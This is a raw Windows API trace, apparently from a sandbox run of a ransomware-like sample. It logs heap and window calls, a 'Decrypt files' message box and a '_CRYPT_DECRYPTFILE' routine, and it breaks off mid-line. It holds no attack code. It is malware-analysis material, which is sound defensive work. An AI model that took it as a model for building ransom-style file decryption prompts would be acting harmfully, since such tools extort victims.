[0249.615] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe531b0 [0249.615] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531a0 [0249.615] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf88b0 | out: hHeap=0xbe0000) returned 1 [0249.615] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531a0 | out: hHeap=0xbe0000) returned 1 [0249.615] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf88b0 [0249.615] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf62e8 [0249.615] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf66d8 [0249.615] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe531a0 [0249.615] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf66d8 | out: hHeap=0xbe0000) returned 1 [0249.615] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531a0 | out: hHeap=0xbe0000) returned 1 [0249.615] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf62e8 | out: hHeap=0xbe0000) returned 1 [0249.615] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0249.615] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d558 [0249.615] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf62e8 [0249.616] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531a0 [0249.616] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53190 [0249.616] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531a0 | out: hHeap=0xbe0000) returned 1 [0249.616] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x6) returned 0xe531a0 [0249.616] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x82) returned 0xd0ec60 [0249.616] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53180 [0249.616] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xd0ec60 | out: hHeap=0xbe0000) returned 1 [0249.616] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53180 | out: hHeap=0xbe0000) returned 1 [0249.616] CreateAcceleratorTableW (paccel=0xe531a0, cAccel=1) returned 0x60181 [0249.616] GetForegroundWindow () returned 0x30150 [0249.616] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531a0 | out: hHeap=0xbe0000) returned 1 [0249.616] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53190 | out: hHeap=0xbe0000) returned 1 [0249.616] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf62e8 | out: hHeap=0xbe0000) returned 1 [0249.616] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d558 | out: hHeap=0xbe0000) returned 1 [0249.616] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0249.616] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0249.616] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53190 [0249.616] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53190 | out: hHeap=0xbe0000) returned 1 [0249.616] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x38) returned 0xe74c60 [0249.616] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0249.616] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53190 [0249.617] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf62e8 [0249.617] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe531a0 [0249.617] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532c0 | out: hHeap=0xbe0000) returned 1 [0249.617] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8880 | out: hHeap=0xbe0000) returned 1 [0249.617] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53290 | out: hHeap=0xbe0000) returned 1 [0249.617] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe08b98 | out: hHeap=0xbe0000) returned 1 [0249.617] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf62e8 | out: hHeap=0xbe0000) returned 1 [0249.617] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531a0 | out: hHeap=0xbe0000) returned 1 [0249.617] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53190 | out: hHeap=0xbe0000) returned 1 [0249.617] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d558 [0249.617] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf62e8 [0249.617] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53190 [0249.617] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8880 [0249.617] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0249.617] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531a0 [0249.617] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531a0 | out: hHeap=0xbe0000) returned 1 [0249.617] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531a0 [0249.617] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531a0 | out: hHeap=0xbe0000) returned 1 [0249.617] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531a0 [0249.617] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531a0 | out: hHeap=0xbe0000) returned 1 [0249.617] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531a0 [0249.617] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531a0 | out: hHeap=0xbe0000) returned 1 [0249.618] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x38) returned 0xe74ca0 [0249.618] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0249.618] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d5d0 [0249.618] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf66d8 [0249.618] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531a0 [0249.618] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531a0 | out: hHeap=0xbe0000) returned 1 [0249.618] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8808 [0249.618] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531a0 [0249.618] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6678 [0249.618] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531a0 | out: hHeap=0xbe0000) returned 1 [0249.618] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c70 [0249.618] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe531a0 [0249.618] SetWindowTextW (hWnd=0x20168, lpString="") returned 1 [0249.621] SendMessageW (hWnd=0x20168, Msg=0xb1, wParam=0xf4240, lParam=0xf423f) returned 0x1 [0249.621] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c70 | out: hHeap=0xbe0000) returned 1 [0249.621] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531a0 | out: hHeap=0xbe0000) returned 1 [0249.621] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf66d8 | out: hHeap=0xbe0000) returned 1 [0249.621] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6678 | out: hHeap=0xbe0000) returned 1 [0249.621] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8808 | out: hHeap=0xbe0000) returned 1 [0249.621] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d5d0 | out: hHeap=0xbe0000) returned 1 [0249.621] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0249.621] TranslateAcceleratorW (hWnd=0x30150, hAccTable=0x60181, lpMsg=0x8bf904) returned 0 [0249.621] IsDialogMessageW (hDlg=0x30150, lpMsg=0x8bf904) returned 1 [0249.622] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.622] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.622] GetWindowLongW (hWnd=0x20168, nIndex=-21) returned 4 [0249.622] GetWindowLongW (hWnd=0x20168, nIndex=-21) returned 4 [0249.622] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.622] SetTextColor (hdc=0xd010720, color=0xff00) returned 0x0 [0249.622] SetBkColor (hdc=0xd010720, color=0x0) returned 0xffffff [0249.622] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.622] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.622] GetWindowLongW (hWnd=0x20168, nIndex=-21) returned 4 [0249.622] GetWindowLongW (hWnd=0x20168, nIndex=-21) returned 4 [0249.622] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.622] SetTextColor (hdc=0xd010720, color=0xff00) returned 0xff00 [0249.622] SetBkColor (hdc=0xd010720, color=0x0) returned 0x0 [0249.622] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.622] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.622] GetWindowLongW (hWnd=0x20168, nIndex=-21) returned 4 [0249.622] GetWindowLongW (hWnd=0x20168, nIndex=-21) returned 4 [0249.623] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.623] SetTextColor (hdc=0xd010720, color=0xff00) returned 0xff00 [0249.623] SetBkColor (hdc=0xd010720, color=0x0) returned 0x0 [0249.623] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0249.623] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d5d0 [0249.623] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8808 [0249.623] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531a0 [0249.623] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531a0 | out: hHeap=0xbe0000) returned 1 [0249.623] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6678 [0249.623] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531a0 [0249.623] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf66d8 [0249.623] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531a0 | out: hHeap=0xbe0000) returned 1 [0249.623] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c70 [0249.623] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531a0 [0249.624] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6528 [0249.624] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531a0 | out: hHeap=0xbe0000) returned 1 [0249.632] MessageBoxW (hWnd=0x0, lpText="Your files will be decrypted if the decryption key was correct", lpCaption="Decrypt files", uType=0x10040) returned 1 [0249.808] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.808] NtdllDialogWndProc_W () returned 0x1 [0249.809] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.809] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.809] NtdllDialogWndProc_W () returned 0x0 [0249.813] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.813] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.813] NtdllDialogWndProc_W () returned 0x0 [0249.824] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.824] NtdllDialogWndProc_W () returned 0x1 [0249.824] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.824] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.824] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.824] SetBkColor (hdc=0x12010267, color=0xf0f0f0) returned 0xffffff [0249.824] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.824] NtdllDialogWndProc_W () returned 0x0 [0249.824] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.824] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.824] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.824] SetBkColor (hdc=0x12010267, color=0xf0f0f0) returned 0xf0f0f0 [0249.824] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.825] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.825] GetWindowLongW (hWnd=0x3014e, nIndex=-21) returned 3 [0249.825] NtdllDialogWndProc_W () returned 0x0 [0249.825] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.825] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.825] GetWindowLongW (hWnd=0x3014e, nIndex=-21) returned 3 [0249.825] NtdllDialogWndProc_W () returned 0x0 [0249.825] GetForegroundWindow () returned 0x1016c [0249.825] GetWindowLongW (hWnd=0x1016c, nIndex=-21) returned 9172760 [0249.842] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.842] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.842] NtdllDialogWndProc_W () returned 0x0 [0249.844] GetForegroundWindow () returned 0x1016c [0249.844] GetWindowLongW (hWnd=0x1016c, nIndex=-21) returned 9172760 [0249.898] GetForegroundWindow () returned 0x1016c [0249.898] GetWindowLongW (hWnd=0x1016c, nIndex=-21) returned 9172760 [0249.908] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.908] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.908] NtdllDialogWndProc_W () returned 0x0 [0249.912] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.912] NtdllDialogWndProc_W () returned 0x1 [0249.912] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.912] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.912] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.912] SetBkColor (hdc=0xef0107b5, color=0xf0f0f0) returned 0xffffff [0249.912] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.912] NtdllDialogWndProc_W () returned 0x0 [0249.912] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.912] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.912] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.912] SetBkColor (hdc=0xef0107b5, color=0xf0f0f0) returned 0xf0f0f0 [0249.912] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.912] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.912] GetWindowLongW (hWnd=0x3014e, nIndex=-21) returned 3 [0249.913] NtdllDialogWndProc_W () returned 0x0 [0249.913] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.913] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.913] GetWindowLongW (hWnd=0x3014e, nIndex=-21) returned 3 [0249.913] NtdllDialogWndProc_W () returned 0x0 [0249.913] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.913] NtdllDialogWndProc_W () returned 0x1 [0249.913] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.913] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.913] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.913] SetBkColor (hdc=0x80106f6, color=0xf0f0f0) returned 0xffffff [0249.913] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.913] NtdllDialogWndProc_W () returned 0x0 [0249.914] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.914] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.914] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.914] SetBkColor (hdc=0x80106f6, color=0xf0f0f0) returned 0xf0f0f0 [0249.914] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.914] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.914] GetWindowLongW (hWnd=0x3014e, nIndex=-21) returned 3 [0249.914] NtdllDialogWndProc_W () returned 0x0 [0249.914] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.914] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.914] GetWindowLongW (hWnd=0x3014e, nIndex=-21) returned 3 [0249.914] NtdllDialogWndProc_W () returned 0x0 [0249.948] GetForegroundWindow () returned 0x1016c [0249.948] GetWindowLongW (hWnd=0x1016c, nIndex=-21) returned 9172760 [0249.988] GetForegroundWindow () returned 0x1016c [0249.988] GetWindowLongW (hWnd=0x1016c, nIndex=-21) returned 9172760 [0250.038] GetForegroundWindow () returned 0x1016c [0250.038] GetWindowLongW (hWnd=0x1016c, nIndex=-21) returned 9172760 [0250.088] GetForegroundWindow () returned 0x1016e [0250.088] GetWindowLongW (hWnd=0x1016e, nIndex=-21) returned 0 [0250.135] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.135] NtdllDialogWndProc_W () returned 0x0 [0250.136] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.136] NtdllDialogWndProc_W () returned 0x1 [0250.136] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.136] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.136] GetSysColor (nIndex=15) returned 0xf0f0f0 [0250.136] SetBkColor (hdc=0x37010775, color=0xf0f0f0) returned 0xf0f0f0 [0250.138] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.138] NtdllDialogWndProc_W () returned 0x0 [0250.139] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.139] NtdllDialogWndProc_W () returned 0x0 [0250.140] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.140] NtdllDialogWndProc_W () returned 0x1 [0250.140] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.140] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.140] GetSysColor (nIndex=15) returned 0xf0f0f0 [0250.140] SetBkColor (hdc=0x37010775, color=0xf0f0f0) returned 0xf0f0f0 [0250.141] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.141] NtdllDialogWndProc_W () returned 0x0 [0250.141] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.141] NtdllDialogWndProc_W () returned 0x0 [0250.141] NtdllDefWindowProc_W () returned 0x0 [0250.141] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.141] NtdllDialogWndProc_W () returned 0x1 [0250.142] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.142] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.142] NtdllDialogWndProc_W () returned 0x0 [0250.156] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8808 | out: hHeap=0xbe0000) returned 1 [0250.156] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf66d8 | out: hHeap=0xbe0000) returned 1 [0250.156] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6678 | out: hHeap=0xbe0000) returned 1 [0250.156] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6528 | out: hHeap=0xbe0000) returned 1 [0250.156] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c70 | out: hHeap=0xbe0000) returned 1 [0250.156] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d5d0 | out: hHeap=0xbe0000) returned 1 [0250.156] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0250.156] TranslateAcceleratorW (hWnd=0x30150, hAccTable=0x60181, lpMsg=0x8bf904) returned 0 [0250.156] TranslateMessage (lpMsg=0x8bf904) returned 0 [0250.156] DispatchMessageW (lpMsg=0x8bf904) returned 0x0 [0250.156] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0250.156] TranslateAcceleratorW (hWnd=0x30150, hAccTable=0x60181, lpMsg=0x8bf904) returned 0 [0250.156] TranslateMessage (lpMsg=0x8bf904) returned 0 [0250.157] DispatchMessageW (lpMsg=0x8bf904) returned 0x0 [0250.157] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0250.157] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.157] GetWindowLongW (hWnd=0x30150, nIndex=-20) returned 256 [0250.157] NtdllDialogWndProc_W () returned 0x1 [0250.157] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.157] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.157] GetClientRect (in: hWnd=0x30150, lpRect=0x8bf650 | out: lpRect=0x8bf650) returned 1 [0250.157] GetCursorPos (in: lpPoint=0x8bf660 | out: lpPoint=0x8bf660*(x=875, y=503)) returned 1 [0250.157] ScreenToClient (in: hWnd=0x30150, lpPoint=0x8bf660 | out: lpPoint=0x8bf660) returned 1 [0250.157] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0250.157] SetCursor (hCursor=0x10003) returned 0x10003 [0250.157] TranslateAcceleratorW (hWnd=0x30150, hAccTable=0x60181, lpMsg=0x8bf904) returned 0 [0250.157] IsDialogMessageW (hDlg=0x30150, lpMsg=0x8bf904) returned 1 [0250.157] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.158] NtdllDialogWndProc_W () returned 0x0 [0250.158] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0250.158] TranslateAcceleratorW (hWnd=0x30150, hAccTable=0x60181, lpMsg=0x8bf904) returned 0 [0250.158] IsDialogMessageW (hDlg=0x30150, lpMsg=0x8bf904) returned 1 [0250.158] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.158] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.158] BeginPaint (in: hWnd=0x30150, lpPaint=0x8bf5f8 | out: lpPaint=0x8bf5f8) returned 0x37010775 [0250.158] EndPaint (hWnd=0x30150, lpPaint=0x8bf5f8) returned 1 [0250.158] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0250.158] TranslateAcceleratorW (hWnd=0x30150, hAccTable=0x60181, lpMsg=0x8bf904) returned 0 [0250.158] IsDialogMessageW (hDlg=0x30150, lpMsg=0x8bf904) returned 1 [0250.158] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.158] NtdllDialogWndProc_W () returned 0x1 [0250.158] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.158] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.159] GetSysColor (nIndex=15) returned 0xf0f0f0 [0250.159] SetBkColor (hdc=0x80106f6, color=0xf0f0f0) returned 0xf0f0f0 [0250.159] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.159] NtdllDialogWndProc_W () returned 0x0 [0250.159] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.159] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.159] GetSysColor (nIndex=15) returned 0xf0f0f0 [0250.159] SetBkColor (hdc=0x80106f6, color=0xf0f0f0) returned 0xf0f0f0 [0250.159] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.159] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.159] GetWindowLongW (hWnd=0x3014e, nIndex=-21) returned 3 [0250.159] NtdllDialogWndProc_W () returned 0x0 [0250.159] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.159] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.159] GetWindowLongW (hWnd=0x3014e, nIndex=-21) returned 3 [0250.159] NtdllDialogWndProc_W () returned 0x0 [0250.160] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0250.160] TranslateAcceleratorW (hWnd=0x30150, hAccTable=0x60181, lpMsg=0x8bf904) returned 0 [0250.160] TranslateMessage (lpMsg=0x8bf904) returned 0 [0250.160] DispatchMessageW (lpMsg=0x8bf904) returned 0x0 [0250.160] GetForegroundWindow () returned 0x30150 [0250.160] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0250.160] GetCursorPos (in: lpPoint=0x8bf740 | out: lpPoint=0x8bf740*(x=875, y=503)) returned 1 [0250.160] ScreenToClient (in: hWnd=0x30150, lpPoint=0x8bf740 | out: lpPoint=0x8bf740) returned 1 [0250.160] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x24) returned 0xe08bf8 [0250.160] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c70 [0250.160] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe531a0 [0250.160] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53290 [0250.160] GetAsyncKeyState (vKey=1) returned 1 [0250.160] GetAsyncKeyState (vKey=2) returned 0 [0250.160] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0250.160] TranslateAcceleratorW (hWnd=0x30150, hAccTable=0x60181, lpMsg=0x8bf904) returned 0 [0250.160] IsDialogMessageW (hDlg=0x30150, lpMsg=0x8bf904) returned 1 [0250.160] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0250.160] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe532c0 [0250.160] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xe72c60 [0250.160] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTFILE") returned 0x12 [0250.160] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe72c60 | out: hHeap=0xbe0000) returned 1 [0250.161] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532c0 | out: hHeap=0xbe0000) returned 